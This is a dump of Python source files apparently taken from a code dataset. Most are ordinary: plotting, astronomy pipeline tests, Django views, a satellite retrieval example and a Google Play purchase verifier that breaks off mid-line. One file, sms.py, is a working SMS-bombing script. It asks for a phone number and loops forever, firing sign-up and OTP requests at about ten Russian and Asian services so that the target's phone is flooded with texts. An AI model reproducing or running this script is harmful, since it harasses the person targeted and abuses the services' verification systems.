ax_rad.set_xticklabels(time_labels[::4])\n\n #assigning curve values\n cols = df.columns\n vals = [\n tuple(df[next(col for col in cols if col.startswith('downward looking'))]),\n tuple(df[next(col for col in cols if col.startswith('upward looking diffuse'))]),\n tuple(df[next(col for col in cols if col.startswith('upward looking solar'))] \n - df[next(col for col in cols if col.startswith('upward looking diffuse'))]),\n tuple(df['M_planar']),\n tuple(df['Albedo_planar']),\n tuple(df['raster_meanM']),\n tuple(df['raster_meanALPHA']),\n tuple(df['maskedmeanM']),\n tuple(df['maskedAlbedo']),\n tuple(df['viz_percent'])\n ]\n #variable assignment\n (globalup, diffusedwn, directdwn, M_planar, Albedo_planar, \n raster_meanM, raster_meanALPHA, maskedmeanM, maskedAlbedo, \n viz_percent) = vals \n\n #measurements\n m = {\n 'Global Up': [globalup, 'orange'],\n 'Direct Dwn': [directdwn, 'salmon'],\n 'Diffuse Dwn': [diffusedwn, 'peachpuff']\n }\n\n #products\n p = {'M':[M_planar,'solid'], 'Alpha':[Albedo_planar,'solid'], 'IDR':['planarIDR','green']}\n r = {'M':[raster_meanM,'dashed'],'Alpha':[raster_meanALPHA,'dashed'],'IDR':[\"rIDR_data\",'dgreen']}\n h = {'M':[maskedmeanM,'dotted'],'Alpha':[maskedAlbedo,'dotted'], 'IDR':[\"hIDR_data\",'ddgreen']}\n v = {'v':[viz_percent, 'k']}\n\n #unification\n plot = {\n **{m[pick][0]:[m[pick][1],'raw'] \n for pick in self.set_measurements},\n **{p[pick][0]:[p[pick][1], pick] \n for pick in self.set_planar_curves},\n **{r[pick][0]:[r[pick][1], pick] \n for pick in self.set_raster_curves},\n **{h[pick][0]:[h[pick][1], pick] \n for pick in self.set_horizon_curves},\n **{v['v'][0]:[v['v'][1], 'viz']}\n } \n\n #plot\n for data, metadata in zip(plot.keys(), plot.values()):\n ax_rad.plot(times, np.zeros((len(times))), alpha=0) #time4host\n if metadata[1] in ('raw', 'IDR'):\n ax_rad.plot(times[:mx], data[:mx], c=metadata[0])\n elif metadata[1] == 'M':\n ax_m.plot(times[:mx], data[:mx], ls=metadata[0], c='mediumorchid')\n elif metadata[1] == 'Alpha':\n ax_alpha.plot(times[:mx], data[:mx], ls=metadata[0], c='darkturquoise')\n elif metadata[1] == 'viz':\n if self.set_visibile_curve:\n ax_viz.plot(times[:mx], data[:mx], c=metadata[0], alpha=0.5)\n else:\n raise KeyError('Plot data|metadata error.')\n\n if self.run_state == True:\n canvas.draw() # Retrieve a view on the renderer buffer\n buf = canvas.buffer_rgba()\n X = np.asarray(buf) # convert to a NumPy array\n plt.close()\n return X\n else:\n plt.close()\n return fig\n ","sub_path":"__albedo__/plotmethods.py","file_name":"plotmethods.py","file_ext":"py","file_size_in_byte":14397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"104941557","text":"import requests\nimport os\nimport sys\nimport time\n\ni = 0\nphone = input('телефон (без +):')\n\nwhile True:\n a = time.strftime(\"%H:%M:%S\", time.localtime())\n\n def ivi():\n time.sleep(1)\n r = requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/',data= {'phone':phone})\n print(a, \"IVI: смс отправлено на номер:\"+phone)\n ivi()\n def tinkoff ():\n time.sleep(1)\n r = requests.post('https://api.tinkoff.ru/v1/sign_up?origin=web%2Cib5%2Cplatform&sessionid=jZSpmBlh57ZaC2PGtgXSK3O93jR311Um.m1-prod-api12&wuid=01e96f12c2be466585c150558a7de6cd&dmpId=5102f430-cf37-4db2-a3c3-49f4663f665d', data={'phone':'+'+phone})\n print(a, \"Тинкооф: смс отправлено на номер:\"+phone)\n tinkoff()\n def delivery_clab():\n time.sleep(1)\n r = requests.post('https://www.delivery-club.ru/ajax/user_otp', data={\"phone\":phone})\n 
print(a, \"Delivery club: смс отправлено на номер:\"+phone)\n delivery_clab()\n def grab():\n time.sleep(1)\n r = requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':phone, 'countryCode': 'ID', 'name': 'nuubi', 'email': 'nuubi@mail.com', 'deviceToken': '*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})\n print(a, \"GrabTaxi: смс отправлено на номер:\"+phone)\n grab()\n def youla():\n time.sleep(1)\n r = requests.post('https://youla.ru/web-api/auth/request_code',data={'phone':phone} )\n print(a, \"Юла: смс отправлено на номер:\"+phone)\n youla()\n def korona ():\n time.sleep(1)\n r = requests.post('https://koronapay.com/transfers/online/api/users/otps',data={'phone': phone})\n print(a, \"Золотая Корона: смс отправлено на номер:\"+phone)\n korona()\n def stoloto ():\n time.sleep(1)\n r = requests.post('https://www.stoloto.ru:443/send-mobile-app-link',data={'phone':phone})\n print(a, \"Столото: смс отправлено на номер:\"+phone)\n stoloto()\n def drugvokrug():\n time.sleep(1)\n r = requests.post('https://drugvokrug.ru:443/siteActions/processSms.htm',data={'cell':phone})\n print(a, \"Другвокруг: смс отправлено на номер:\"+phone)\n drugvokrug()\n def belkacar():\n time.sleep(1)\n r = requests.post('https://belkacar.ru:443/get-confirmation-code',data={'phone':phone})\n print(a, \"BelkaCar: смс отправлено на номер:\"+phone)\n belkacar()\n def dodopizza():\n time.sleep(1)\n r = requests.post('https://dodopizza.ru/api/sendconfirmationcode',data={'phoneNumber':phone})\n print(a, \"DodoPizza: смс отправлено на номер:\"+phone)\n i += 1\ninput()","sub_path":"sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"52817346","text":"\n\"\"\"\npy.test module for unit testing the cube_build step.\n\"\"\"\n\nimport os\nimport time\nfrom glob import glob\n\nimport pytest\nfrom astropy.io import fits\nfrom jwst.cube_build.cube_build_step import CubeBuildStep\n\nfrom nirspec_pipe_testing_tool.utils import change_filter_opaque2science\nfrom . import cube_build_utils\nfrom nirspec_pipe_testing_tool import core_utils\n\n\n\n# HEADER\n__author__ = \"M. A. Pena-Guerrero\"\n__version__ = \"1.3\"\n\n# HISTORY\n# Nov 2017 - Version 1.0: initial version completed\n# Mar 2019 - Version 1.1: separated completion from other tests\n# Apr 2019 - Version 1.2: implemented nptt_log capability\n# Apr 2023 - Version 1.3: Cleaned-up code\n\n\n# Set up the fixtures needed for all of the tests, i.e. open up all of the FITS files\n\n# Default names of pipeline input and output files\n@pytest.fixture(scope=\"module\")\ndef set_inandout_filenames(request, config):\n step = \"cube_build\"\n step_info = core_utils.set_inandout_filenames(step, config)\n step_input_filename, step_output_filename, in_file_suffix, out_file_suffix, True_steps_suffix_map = step_info\n return step, step_input_filename, step_output_filename, in_file_suffix, out_file_suffix, True_steps_suffix_map\n\n\n# fixture to read the output file header\n@pytest.fixture(scope=\"module\")\ndef output_vars(set_inandout_filenames, config):\n # determine if the pipeline is to be run in full, per steps, or skipped\n run_calwebb_spec2 = config.get(\"run_calwebb_spec2_in_full\", \"run_calwebb_spec2\")\n if run_calwebb_spec2 == \"skip\":\n print('\\n * PTT finished processing run_calwebb_spec2 is set to skip. 
\\n')\n pytest.exit(\"Skipping pipeline run and tests for spec2, run_calwebb_spec2 is set to skip in PTT_config file.\")\n elif \"T\" in run_calwebb_spec2:\n run_calwebb_spec2 = True\n else:\n run_calwebb_spec2 = False\n\n # get the general info\n set_inandout_filenames_info = core_utils.read_info4output_vars(config, set_inandout_filenames)\n step, txt_name, step_input_file, step_output_file, outstep_file_suffix = set_inandout_filenames_info\n run_pipe_step = config.getboolean(\"run_spec2_steps\", step)\n # determine which tests are to be run\n cube_build_completion_tests = config.getboolean(\"run_pytest\", \"_\".join((step, \"completion\", \"tests\")))\n #cube_build_reffile_tests = config.getboolean(\"run_pytest\", \"_\".join((step, \"reffile\", \"tests\")))\n #cube_build_validation_tests = config.getboolean(\"run_pytest\", \"_\".join((step, \"validation\", \"tests\")))\n run_pytests = [cube_build_completion_tests]#, cube_build_reffile_tests, cube_build_validation_tests]\n\n # Only run step if data is IFU\n output_directory = config.get(\"calwebb_spec2_input_file\", \"output_directory\")\n initial_input_file = config.get(\"calwebb_spec2_input_file\", \"input_file\")\n initial_input_file = os.path.join(output_directory, initial_input_file)\n if os.path.isfile(initial_input_file):\n inhdr = fits.getheader(step_input_file)\n detector = inhdr[\"DETECTOR\"]\n filt = inhdr[\"FILTER\"]\n grat = inhdr[\"GRATING\"]\n gratfilt = grat + \"-\" + filt + \"_s3d\"\n else:\n pytest.skip(\"Skipping \"+step+\" because the initial input file given in PTT_config.cfg does not exist.\")\n\n # if run_calwebb_spec2 is True calwebb_spec2 will be called, else individual steps will be ran\n step_completed = False\n end_time = '0.0'\n\n # Get the logfile instance for NPTT created in the run.py script\n nptt_log = os.path.join(output_directory, 'NPTT_calspec2_' + detector + '.log')\n nptt_log = core_utils.mk_nptt_log(nptt_log, reset=False)\n\n if core_utils.check_IFU_true(inhdr):\n # check if the filter is to be changed\n change_filter_opaque = config.getboolean(\"calwebb_spec2_input_file\", \"change_filter_opaque\")\n if change_filter_opaque:\n is_filter_opaque, step_input_filename = change_filter_opaque2science.change_filter_opaque(step_input_file,\n step=step)\n if is_filter_opaque:\n filter_opaque_msg = \"With FILTER=OPAQUE, the calwebb_spec2 will run up to the extract_2d step. 
\" \\\n \"Cube build pytest now set to Skip.\"\n print(filter_opaque_msg)\n core_utils.add_completed_steps(txt_name, step, outstep_file_suffix, step_completed, end_time)\n pytest.skip(\"Skipping \"+step+\" because FILTER=OPAQUE.\")\n\n if run_calwebb_spec2:\n outhdr = fits.getheader(step_output_file)\n return outhdr, step_output_file, run_pytests, nptt_log\n else:\n if run_pipe_step:\n if os.path.isfile(step_input_file):\n if change_filter_opaque:\n nptt_log.info(filter_opaque_msg)\n\n # Create the pipeline step log\n stp_pipelog = \"calspec2_\" + step + \"_\" + detector + \".log\"\n core_utils.mk_stpipe_log_cfg(output_directory, stp_pipelog)\n print(\"Pipeline step screen output will be logged in file: \", stp_pipelog)\n\n msg = \" *** Step \"+step+\" set to True\"\n print(msg)\n nptt_log.info(msg)\n stp = CubeBuildStep()\n\n # check that previous pipeline steps were run up to this point\n core_utils.check_completed_steps(step, step_input_file)\n\n # get the right configuration files to run the step\n local_pipe_cfg_path = config.get(\"calwebb_spec2_input_file\", \"local_pipe_cfg_path\")\n # start the timer to compute the step running time\n start_time = time.time()\n if local_pipe_cfg_path == \"pipe_source_tree_code\":\n result = stp.call(step_input_file)\n else:\n result = stp.call(step_input_file, config_file=local_pipe_cfg_path+'/cube_build.cfg')\n result.save(step_output_file)\n # end the timer to compute the step running time\n end_time = repr(time.time() - start_time) # this is in seconds\n msg = \"Step \"+step+\" took \"+end_time+\" seconds to finish\"\n print(msg)\n nptt_log.info(msg)\n\n # determine the specific output of the cube step\n specific_output_file = glob(step_output_file.replace('cube.fits', (gratfilt + '*.fits').lower()))[0]\n cube_suffix = specific_output_file.split('cube_build_')[-1].replace('.fits', '')\n\n # record info\n step_completed = True\n outhdr = fits.getheader(step_output_file)\n\n # add the running time for this step\n core_utils.add_completed_steps(txt_name, step, \"_\" + cube_suffix, step_completed, end_time)\n return outhdr, step_output_file, run_pytests, nptt_log\n\n else:\n msg = \" The input file does not exist. 
Skipping step.\"\n print(msg)\n nptt_log.info(msg)\n core_utils.add_completed_steps(txt_name, step, outstep_file_suffix, step_completed, end_time)\n pytest.skip(\"Skipping \"+step+\" because the input file does not exist.\")\n\n else:\n msg = \"Skipping running pipeline step \"+step\n print(msg)\n nptt_log.info(msg)\n end_time = core_utils.get_stp_run_time_from_screenfile(step, detector, output_directory)\n\n # record info\n # specific cube step suffix\n cube_suffix = \"_s3d\"\n if os.path.isfile(step_output_file):\n outhdr = fits.getheader(step_output_file)\n step_completed = True\n # add the running time for this step\n core_utils.add_completed_steps(txt_name, step, cube_suffix, step_completed, end_time)\n return outhdr, step_output_file, run_pytests, nptt_log\n else:\n step_completed = False\n # add the running time for this step\n core_utils.add_completed_steps(txt_name, step, cube_suffix, step_completed, end_time)\n pytest.skip(\"Test skipped because input file \"+step_output_file+\" does not exist.\")\n\n else:\n pytest.skip(\"Skipping \"+step+\" because data is not IFU.\")\n\n\n# Unit tests\n\ndef test_s_ifucub_exists(output_vars):\n # get the logger instance\n nptt_log = output_vars[-1]\n # want to run this pytest?\n # output_vars[2] = cube_build_completion_tests, cube_build_reffile_tests, cube_build_validation_tests\n run_pytests = output_vars[2][0]\n if not run_pytests:\n msg = \"Skipping completion pytest: option to run Pytest is set to False in NPTT_config.cfg file.\"\n print(msg)\n nptt_log.info(msg)\n pytest.skip(msg)\n else:\n msg = \" * Running completion pytest...\"\n print(msg)\n nptt_log.info(msg)\n assert cube_build_utils.s_ifucub_exists(output_vars[0]), \"The keyword S_IFUCUB was not added to the header \" \\\n \"--> IFU cube_build step was not completed.\"\n\n","sub_path":"nirspec_pipe_testing_tool/calwebb_spec2_pytests/M_cube_build/test_cube_build.py","file_name":"test_cube_build.py","file_ext":"py","file_size_in_byte":9407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"549783611","text":"# Copyright 2016 the original author or authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__author__ = \"Julian Debatin\"\n__copyright__ = \"The authors\"\n__license__ = \"Apache 2\"\n__email__ = \"juliandebatin@gmail.com\"\n__status__ = \"Production\"\n\nfrom ModuroModel.Spa.SpaPcdbCdiInUa import SpaPcdbCdiInUa\n\n\nclass SpaPcdbCdiInDa(SpaPcdbCdiInUa):\n def __init__(self, sim, simthread):\n SpaPcdbCdiInUa.__init__(self, sim, simthread)\n\n def _initModel(self):\n self.name = \"SpaCdbPcdiInDa\"\n self.adhFactor = 0.25\n self.cellTypes = self._createCellTypes()\n self.energyMatrix = self._createEnergyMatrix()\n self._run() # Must be the last statement.\n\n\n def _createEnergyMatrix(self):\n energyMatrix = [[0, 14, 14, 14, 14, 4],\n [0, -1, 1, 3, 12, 12],\n [0, 0, 6, 4, 8, 14],\n [0, 0, 0, 5, 8, 12],\n [0, 0, 0, 0, 6, 4],\n [0, 0, 0, 0, 0, 2]]\n\n return 
energyMatrix","sub_path":"Simulation/ModuroModel/Spa/SpaPcdbCdiInDa.py","file_name":"SpaPcdbCdiInDa.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"389115060","text":"#===============================================================================\n# Copyright 2011 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#===============================================================================\n\n#============= enthought library imports =======================\nfrom traits.api import on_trait_change\n#============= standard library imports ========================\n\n#============= local library imports ==========================\nfrom src.envisage.core.core_ui_plugin import CoreUIPlugin\n\nclass ArArUIPlugin(CoreUIPlugin):\n '''\n '''\n id = 'pychron.arar'\n\n def _preferences_pages_default(self):\n from arar_preferences_page import ArArPreferencesPage\n return [ArArPreferencesPage]\n\n def _action_sets_default(self):\n from arar_action_set import ArArActionSet\n return [ArArActionSet]\n\n def _perspectives_default(self):\n from arar_perspective import ArArPerspective\n p = [ArArPerspective]\n return p\n\n def _get_manager(self):\n return self.application.get_service('src.arar.arar_manager.ArArManager')\n\n def _get_db(self):\n return self.application.get_service('src.database.adapters.massspec_database_adapter.MassSpecDatabaseAdapter')\n\n#============= views ===================================\n def _views_default(self):\n '''\n '''\n rv = [\n# self._create_data_directory_view,\n self._create_notes_view,\n self._create_info_view,\n self._create_engine_view,\n# self._create_engine_configure_view,\n self._create_database_view\n ]\n return rv\n\n def _create_database_view(self, **kw):\n man = self._get_db()\n man.connect()\n\n man.selector_factory()\n args = dict(\n id='pychron.arar.database',\n name='Database',\n obj=man.selector\n )\n return self.traitsuiview_factory(args, kw)\n\n def _create_engine_view(self, **kw):\n man = self._get_manager()\n args = dict(\n id='pychron.arar.engine',\n name='Engine',\n obj=man\n )\n return self.traitsuiview_factory(args, kw)\n\n def _create_engine_configure_view(self, **kw):\n man = self._get_manager()\n args = dict(\n id='pychron.arar.engine.configure',\n name='Configure Engine',\n obj=man.engine,\n view='configure_view'\n )\n return self.traitsuiview_factory(args, kw)\n\n\n def _create_notes_view(self, **kw):\n from notes_view import NotesView\n obj = NotesView()\n manager = self._get_manager()\n if manager is not None:\n manager.on_trait_change(obj.selected_update, 'selected')\n\n args = dict(id='pychron.arar.notes_view',\n name='Notes',\n obj=obj\n )\n return self.traitsuiview_factory(args, kw)\n\n def _create_info_view(self, **kw):\n from info_view import InfoView\n obj = InfoView()\n manager = self._get_manager()\n if manager is not None:\n manager.on_trait_change(obj.selected_update, 'selected')\n\n args = dict(id='pychron.arar.info',\n 
name='Info',\n obj=obj\n )\n return self.traitsuiview_factory(args, kw)\n\n# def _create_data_directory_view(self, **kw):\n# modeler_manager = self._get_manager()\n#\n# args = dict(\n# id='pychron.modeler.data_directory',\n# name='Data',\n# view='data_select_view',\n# obj=modeler_manager#.modeler,\n# )\n# return self.traitsuiview_factory(args, kw)\n\n @on_trait_change('application.gui:started')\n def _started(self, obj, name, old, new):\n '''\n\n '''\n if new is True:\n app = self.application\n manager = app.get_service('src.arar.arar_manager.ArArManager')\n# manager.open_default()\n manager.demo_open()\n#============= EOF ====================================\n","sub_path":"src/zobs/arar/plugins/arar_ui_plugin.py","file_name":"arar_ui_plugin.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"352890467","text":"from django.shortcuts import render\nimport pickle\nimport os\nimport pandas as pd\nfrom pathlib import Path\n\nBASE_DIR = Path(__file__).resolve().parent.parent\nPkl_Filename = os.path.join(BASE_DIR, \"app/tweet.pkl\")\n\nwith open(Pkl_Filename, 'rb') as file: \n Pickled_LR_Model = pickle.load(file)\n\n# Create your views here.\ndef index(request):\n\t\n\tif request.method==\"POST\":\n\n\t\ttextinp = request.POST[\"textinp\"]\n\t\tprint(textinp)\n\t\tflag = Pickled_LR_Model.predict(pd.Series(textinp)) \n\t\tprint(flag)\n\t\tif(flag[0] == 0):\n\t\t\tfd = True\n\t\telse:\n\t\t\tfd = False\n\t\tcontext = {\n\t\t\t\"flag\" : fd\n\t\t}\n\t\treturn render(request,'app/index.html', context)\t\n\n\n\telse:\n\t\treturn render(request,'app/index.html')\t","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"380958164","text":"from plotly.offline import download_plotlyjs, init_notebook_mode, iplot\nfrom plotly.graph_objs import *\nimport plotly\nplotly.offline.init_notebook_mode()\n\n\ntrace1 = Scatter(\n x = Actual1.ds,\n y = Actual1.yhat,\n name='Actual'\n \n)\n\ntrace2 = Scatter(\n x = Forecast1.ds,\n y = Forecast1.yhat,\n name='Predicted'\n)\n\ndata = [trace1,trace2]\n\nlayout = Layout(\n width=1100,\n height=500,\n title='Sales Forecast',\n titlefont=dict(\n family='Helvetica',\n size=16,\n color='#394242'\n ),\n xaxis=dict(\n title='Time'\n ),\n yaxis=dict(\n range=[0,700000],\n gridcolor='#a4a5a9',\n title='Sales'\n )\n) \n \nfig = dict(data=data, layout=layout)\niplot(fig)","sub_path":"Mode/demo/spaces/Sales/Clone of Forecasting in Python.57f42ffc25d5/notebook/cell-number-19.6fc7632b1d0d.py","file_name":"cell-number-19.6fc7632b1d0d.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"470982124","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os\nimport json\nfrom otto.core.bitso_ import BitsoTrade\n# from otto.helpers import ottoHelpers # Need to update to Python3\n\n# Global Vars\n#_oh = ottoHelpers()\n#_oh.logger.info('Helpers are ON!')\n\ndef main():\n \"\"\" Main Method to execute Otto in console\n \"\"\"\n # Get Bitso Credentials\n _b_key = os.getenv('BITSO_API_KEY')\n _b_secr = os.getenv('BITSO_API_SECRET')\n # Bitso class initialization\n _bitso = BitsoTrade(_b_key, _b_secr)\n # Retrieve all currency-pair prices\n #_bitso.all_prices()\n # Set order\n #curr_pair = \"ltc_mxn\"\n #_bitso.set_market_order(curr_pair, 'buy', 
0.002, only_check=True)\n    # Get Balance\n    #_bitso.get_balances()\n    # Fetch Config File\n    with open('config.json', 'r') as cfg:\n        config = json.loads(cfg.read())\n    # Set Automatic Trading on\n    _bitso.automate(config)\n\nif __name__ == '__main__':\n    print('\\nInitializing OttoCT v0.0.1.beta...', '\\n')\n    main()\n    print('Done!')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"144501344","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/9/30\n# @Author : hay\nimport os\n\n\nclass OperateFiles(object):\n\n    def save_file(self, django_file_obj, save_path: str):\n        # Save the file\n        try:\n            if '.' not in save_path:\n                save_path = os.path.join(save_path, django_file_obj.name)\n            f = open(save_path, 'wb')\n            for chunk in django_file_obj.chunks():\n                f.write(chunk)\n            f.close()\n            try:\n                suffix = django_file_obj.name.split('.')[-1]\n            except:\n                suffix = ''\n            ret = {'file_name': django_file_obj.name, 'file_size': django_file_obj.size,\n                   'file_save_path': save_path, 'file_suffix': suffix}\n        except Exception as e:\n            print(e)\n            ret = {}\n        return ret\n\n    def deleta_file(self, file_name):\n        # Remove the file\n        if os.path.exists(file_name):\n            os.remove(file_name)\n            return True\n        else:\n            return False\n","sub_path":"core/operatefiles.py","file_name":"operatefiles.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"545501596","text":"import random\nfrom django.contrib.admin.utils import flatten\nfrom django.core.management.base import BaseCommand\nfrom django_seed import Seed\nfrom users.models import User\nfrom rooms.models import Room\nfrom lists.models import List\n\n\nclass Command(BaseCommand):\n\n    help = \"Seed lists\"\n\n    def add_arguments(self, parser):\n        parser.add_argument(\"--number\", type=int, default=1)\n\n    def handle(self, *args, **options):\n        number = options.get(\"number\")\n        seeder = Seed.seeder()\n        all_users = User.objects.all()\n        all_rooms = Room.objects.all()\n        seeder.add_entity(\n            List, number, {\"user\": lambda x: random.choice(all_users),},\n        )\n\n        created = seeder.execute()\n        cleaned = flatten(list(created.values()))\n        for pk in cleaned:\n            list_model = List.objects.get(pk=pk)\n            to_add = all_rooms[random.randint(1, 5) : random.randint(6, 30)]\n            list_model.rooms.add(*to_add)\n        self.stdout.write(self.style.SUCCESS(f\"{number} list(s) created\"))\n","sub_path":"lists/management/commands/seed_list.py","file_name":"seed_list.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"177066052","text":"import pathlib\n\nfrom ...source.file import FileSourceConfig\nfrom ...source.json import JSONSource\nfrom ...source.source import Sources\nfrom ...base import field\n\n\nFIELD_SOURCES = field(\n    \"Sources for loading and saving\",\n    default_factory=lambda: Sources(\n        JSONSource(\n            FileSourceConfig(\n                filename=pathlib.Path(\"~\", \".cache\", \"dffml.json\")\n            )\n        )\n    ),\n    labeled=True,\n    required=True,\n)\n","sub_path":"dffml/util/config/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"300046825","text":"from django.conf.urls import url\nfrom . 
import views\n\n\nurlpatterns = [\n    url(r'^index/$', views.index, name='index'),\n    # url(r'^say/$', views.say),\n    url(r'^hand/(?P<number>\\d{3})/(?P<letters>[A-Za-z]{3})/$', views.hand),\n    url(r'^post/$', views.post)\n]","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"63216080","text":"import os.path\n\nimport h5py\nimport numpy as np\n\nimport l2_afp\n\nddir = '/data/merrelli/l2_afp_sandbox'\nL1bfile = os.path.join(ddir, 'oco2_L1bScND_10246a_160604_B8000r_170630100507.h5')\nMetfile = os.path.join(ddir, 'oco2_L2MetND_10246a_160604_B8000r_170630042307.h5')\nIDPfile = os.path.join(ddir, 'oco2_L2IDPND_10246a_160604_B8100r_170721105543.h5')\n\n# clear sounding over california\nsounding_id = '2016060421174703'\n\n# cloudy sounding over pacific ocean near coast\n#sounding_id = '2016060421171802'\n\nmerradir = '/data/OCO2/L2_datasets/merra_composite'\nabscodir = '/data/OCO2/absco'\n\nwrkdir = '/home/merrelli/projects/l2_afp/examples/wrkdir'\nbase_sprop_file = 'l2_thinned_aerosol_combined.h5'\nsprop_grid_file = 'WC_sproperty_grid.h5'\nvardefs = [\n    {'lua_name':'Water', 'grp_name':'wc_variable', \n     'grid_filename':sprop_grid_file, 'grid_grp_name':'WC_grid',\n     'svname':'Water cloud R_eff'} ]\n\nconfig_file = l2_afp.utils.get_lua_config_files()['watercloud_only']\n\nl2_obj = l2_afp.wrapped_fp_aerosol_reff(\n    base_sprop_file, vardefs,\n    L1bfile, Metfile, config_file, abscodir,\n    merradir = merradir, sounding_id = sounding_id, imap_file = IDPfile, wrkdir=wrkdir)\n\nSa = l2_obj.get_Sa()\nSe_diag = l2_obj.get_Se_diag()\nKupdate = l2_obj.Kupdate\ny = l2_obj.get_y()\nx0 = l2_obj.get_x()\n\nSe = l2_afp.utils.diagcmatrix(Se_diag)\n\nx_i_list, Fx_i_list, S_i_list = l2_afp.bayesian_nonlinear_solver(\n    Se, Sa, y, x0, Kupdate, start_gamma=10.0,\n    max_iteration_ct = 5, debug_write=False, \n    match_l2_fp_costfunc=True)\n\n# change these into ndarray that match the normal l2 single sounding output, \n# with iteration output turned on.\n# shapes are [1, N_iter, N_var] for state var, uncertainty;\n# and [1, N_iter, N_var, N_var] for posterior covar.\nx_i = np.array(x_i_list)[np.newaxis, ...]\nFx_i = np.array(Fx_i_list)[np.newaxis, ...]\nS_i = np.array(S_i_list)[np.newaxis, ...]\nx_unc_i = np.zeros_like(x_i)\nfor n in range(S_i.shape[1]):\n    x_unc_i[0,n,:] = np.sqrt(np.diag(S_i_list[n]))\n\noutput_filename = 'l2_afp_reff_test_'+sounding_id+'.h5'\nl2_obj.write_h5_output_file(\n    output_filename, final_state = x_i_list[-1], \n    final_uncert = np.sqrt(np.diag(S_i_list[-1])), \n    modeled_rad = Fx_i_list[-1])\n\n# now append in the Iteration data.\n# note that h5py will nicely create the needed groups for you, \n# so we can do this easily in one loop.\nh = h5py.File(output_filename, 'a')\nvnames = [\n    '/Iteration/RetrievedStateVector/state_vector_result', \n    '/Iteration/RetrievalResults/aposteriori_covariance_matrix',\n    '/Iteration/RetrievedStateVector/state_vector_aposteriori_uncert',\n    '/Iteration/SpectralParameters/modeled_radiance']\nvdata = [x_i, S_i, x_unc_i, Fx_i]\nfor vname, v in zip(vnames, vdata):\n    h.create_dataset(vname, data = v)\nh.close()\n","sub_path":"examples/example_l2_afp_reff_run.py","file_name":"example_l2_afp_reff_run.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"523868931","text":"# -*- coding: utf-8 
-*-\n\n\"\"\"\n#=============================================================================\n#\n#     FileName: ggpay.py\n#         Desc:  \n#\n#       Author: dantezhu\n#        Email: dantezhu@qq.com\n#     HomePage: http://www.vimer.cn\n#\n#      Created: 2015-04-03 17:48:34\n#      Version: 0.0.1\n#      History:\n#                   0.0.1 | dantezhu | 2015-04-03 17:48:34 | init\n#\n#=============================================================================\n\"\"\"\n\nimport logging\nimport requests\n\nlogger = logging.getLogger('ggpay')\n\n\nclass GGPay(object):\n    \"\"\"Google payment\"\"\"\n\n    client_id = None\n    client_secret = None\n    access_token = None\n\n    def __init__(self, client_id, client_secret, access_token):\n        self.client_id = client_id\n        self.client_secret = client_secret\n        self.access_token = access_token\n    \n    def verify_bill(self, bill_id, package_name, product_id, purchase_token):\n        \"\"\"\n        Check whether the order is valid.\n        Note: when the client starts the purchase, it must pass bill_id in the extra field.\n        Docs: https://developers.google.com/android-publisher/api-ref/purchases/products/get?hl=zh\n        \"\"\"\n        logger.debug('purchase check start.bill_id: %s', bill_id)\n\n        # This is the old version\n        # url_tpl = 'https://www.googleapis.com/androidpublisher/v1.1/applications/{packageName}/inapp/{productId}/purchases/{token}'\n        url_tpl = 'https://www.googleapis.com/androidpublisher/v2/applications/{packageName}/purchases/products/{productId}/tokens/{token}'\n\n        url = url_tpl.format(\n            packageName=package_name,\n            productId=product_id,\n            token=purchase_token,\n        )\n\n        rsp = requests.get(url, params=dict(\n            access_token=self.access_token,\n        ))\n\n        if not rsp.ok:\n            logger.error('purchase invalid. status_code: %s, rsp: %s', 